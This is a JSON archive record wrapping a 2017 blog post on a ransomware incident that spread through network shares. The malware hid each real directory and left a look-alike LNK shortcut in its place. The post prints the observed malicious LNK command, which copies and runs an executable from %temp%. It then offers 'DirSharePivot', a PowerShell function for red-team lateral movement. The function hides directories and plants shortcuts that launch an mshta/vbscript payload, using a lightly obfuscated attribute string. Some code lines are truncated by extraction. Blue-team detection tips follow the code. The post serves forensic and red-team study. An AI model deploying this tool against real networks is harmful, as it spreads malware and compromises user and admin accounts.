{
	"id": "a44fa548-f1c3-4263-ae16-258621fb0f72",
	"created_at": "2026-04-06T02:12:06.533981Z",
	"updated_at": "2026-04-10T13:11:28.854073Z",
	"deleted_at": null,
	"sha1_hash": "a65f1ff4c9383496e7609c1977d1aa48a8e33be0",
	"title": "Abusing network shares for efficient lateral movements and privesc (DirSharePivot)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 85906,
	"plain_text": "Abusing network shares for efficient lateral movements and\r\nprivesc (DirSharePivot)\r\nBy David Routin\r\nPublished: 2017-11-14 · Archived: 2026-04-06 01:54:48 UTC\r\nBackground\r\nAbout a year ago my team and I had were called to perform a forensic analysis on a customer network. The reason\r\nfor this was that a computer was first infected by a ransomware, and for some (unknown) reasons, several other\r\nworkstations were getting \"infected\" after only 3 hours.\r\nAfter 5 hours (time of my intervention) I discovered that:\r\n- 80% of the workstations were infected\r\n- The network was partially segmented but the infection occurs on all segments\r\n- A malware process was even running on the file Server as... \"Domain Administrator\" :-/\r\n- No track of 4624 (Logon Type 3) events or any other track of lateral movements/authentications\r\nInteresting... hum :)\r\nIn this article I will describe my analysis of the threat and also how to take advantage of this method in a \"safer\"\r\nand more \"controlled\" way to  move laterally (or even perform privesc) in red team operations. (practical\r\nexploitation code will be provided).\r\nThis method may be particularly useful in segmented/restricted networks and could be used to circumvent SIEM\r\ndetections based on network flows \u0026 Windows authentication events only use cases.\r\nI will also suggest some blue team possibilities to catch this kind of attacks.\r\nNice read :)\r\nLateral movement abusing user interactions\r\nAfter finding the \"patient 0\", I finally see something weird on the main network shares:\r\nPartial screenshot of network share with \"supposed\" directories links\r\nThis looks interesting... I asked some employees and they told me that these links were legits and that when they\r\nclick on them they access the normal contents without issue... (furthermore DFS can provide share looking as\r\nLNK/Shortcuts).\r\nBut I decided to analyze this...\r\nhttps://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html\r\nPage 1 of 5\n\nA \"dir -Force\" output in the network share will return the following result, showing the very interesting way to\r\nhide the threat:\r\n- Original directories are set to \"Hidden\" (-h-), \r\n- from there a LNK is created with the original directory name\r\ndir -Force in the current share\r\nLNK File analysis\r\nAn analysis of one of the .LNK confirmed that:\r\n- a malicious payload is embedded\r\n- The LNK use a \"Directory\" icon (Shell32.dll, Icon index: 3)\r\nMalicious payload:\r\n.\\Windows\\system32\\cmd.exe /c start explorer.exe \"Intel\" \u0026 type \"3b5a5b29263677d600.exe\" \u003e \"%temp%\\3b5a5b292636\r\n\"%temp%\\3b5a5b29263677d600.exe\"\r\nWhat does it means ?\r\nhttps://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html\r\nPage 2 of 5\n\nWhen a user clicks on any \"fake directory\":\r\n- An explorer window is opened to access the \"real\" (hidden) directory making the use think everything is legit\r\nthanks to explorer.exe \"Intel\"\r\n- The malware is copied on the victim user (in %temp%)\r\n- The malware is finally executed locally !\r\n- Once activated, the malware tries to infect all other accessible shares from this new victim\r\n- At the end we have a \"continuously\" improved lateral movement over the whole network thanks to users actions\r\n(network share access) !\r\nIn few minutes/hours all the network may become infected depending on the volume of access in the network\r\nshare.\r\nBenefits for attacker\r\nThis lateral movement technique is:\r\n- Particularly efficient (a whole domain may be compromised in few hours)\r\n- Privilege escalation possible ! Indeed, everyone is using network shares in a company, so you are likely to get\r\nmore and more accounts and privileges, in this current case, even a logged Domain Admin have used the network\r\nshare and compromised its account !\r\n- Network segmentation is not a problem for attackers as the spreading point is a network share\r\n- Likely not detected by IDS/SIEM as it doesn't trigger any authentication attempts or network scanning from a\r\nunique host\r\nUsing this technique in Red Team operations\r\nAs shown previously this technique may be of great interests when standards privesc/lateral movements failed\r\n(high level of patch, strong segmentation etc) during red teams engagements.\r\nFor this usage it would be very dangerous to pOwn users which will infect all their own accessible shares etc...\r\n(cleaning that at the end of the engagement may be a pain :D)\r\nIn this context I have developped the following powershell code to limit this effect only for a specific directory.\r\nFurthermore, the original method was noisy and not optimized:\r\n- \"cmd /c\" was noisy as it was generating a quick window console...\r\n- writing payload to disk (we are in 2017 :) )\r\nTo get rid of this I have used mshta command line running cmd (it is not mandatory as everything could be done\r\nusing VBscript) with \"vbhide\" option to hide any possible window, detections will be also limited with in memory\r\npayload (no payload written on disk).\r\nfunction DirSharePivot\r\n{\r\n \u003c#\r\n .SYNOPSIS\r\n Function: DirSharePivot\r\n Author: David ROUTIN - 13 nov 2017\r\nhttps://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html\r\nPage 3 of 5\n\nExample:\r\n DirSharePivot -StartDir K:\\test -Payload \"powershell -enc XXXXXXXXXXXXXXXXXXXXXXXX\"\r\n This will set all the directories in the defined Path as Hidden (non recursive to keep control), aft\r\n name of each hidden directories.\r\n This LNK will have a \"directory shortcut icon\", and will open a explorer to the selected directory w\r\n #\u003e\r\n [CmdletBinding()] Param(\r\n \r\n [Parameter(Position = 0, Mandatory = $True)]\r\n [String]\r\n $StartDir,\r\n [Parameter(Position = 1, Mandatory = $True)]\r\n [String]\r\n $Payload\r\n \r\n )\r\n $Filepath = Get-ChildItem -path $StartDir -Force -directory\r\n foreach ( $Object in $Filepath ) {\r\n $Object.Attributes = (-join \"uRtHoirdebn\"[3,5,7,7,8,10])\r\n \r\n $Shell = New-Object -ComObject (\"WScript.Shell\")\r\n $ShortCut = $Shell.CreateShortcut($StartDir + \"\\\" + $Object + \".lnk\")\r\n $ShortCut.TargetPath=\"mshta.exe\"\r\n $ShortCut.Arguments= 'vbscript:Close(Execute(\"Set x = CreateObject(\"\"WScript.shell\"\"): x.Run \"\"cmd /\r\n $ShortCut.WindowStyle = 1;\r\n $ShortCut.Hotkey = \"CTRL+SHIFT+F\";\r\n $ShortCut.IconLocation = \"C:\\windows\\System32\\shell32.dll, 3\";\r\n $ShortCut.Description = $Object;\r\n $ShortCut.Save()\r\n }\r\n}\r\nBlue team actions\r\nEven not perfect, several tactics may be deployed to detect/protect this spreading method.\r\n- Audit process tracking and create use cases based on sensitives MS signed binaries usage (mshta, powershell,\r\nrundll32...)\r\n- Monitor actively powershell executions\r\n- Properly control write permissions on main directories on your share\r\n- Use Applocker to limit the risk of unecessary usage of MS signed binaries.\r\nhttps://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html\r\nPage 4 of 5\n\n- Activate \"Audit Object Access\" and monitor sensitive shares or part of them (as enabling this on a high volume\r\ncorporate share may have negative performances impacts) to detect specific .LNK.\r\nFor example you have a \"Honeypot\" directory, you may track creation of \"Honeypot.lnk\" (event 4656)\r\n- Create SIEM rule to monitor multiple .LNK file creations on shares (monitoring events 5145 may be an option at\r\nthe fileserver level)\r\nDavid Routin\r\nSource: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html\r\nhttps://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html"
	],
	"report_names": [
		"abusing-user-shares-for-efficient.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775441526,
	"ts_updated_at": 1775826688,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a65f1ff4c9383496e7609c1977d1aa48a8e33be0.pdf",
		"text": "https://archive.orkl.eu/a65f1ff4c9383496e7609c1977d1aa48a8e33be0.txt",
		"img": "https://archive.orkl.eu/a65f1ff4c9383496e7609c1977d1aa48a8e33be0.jpg"
	}
}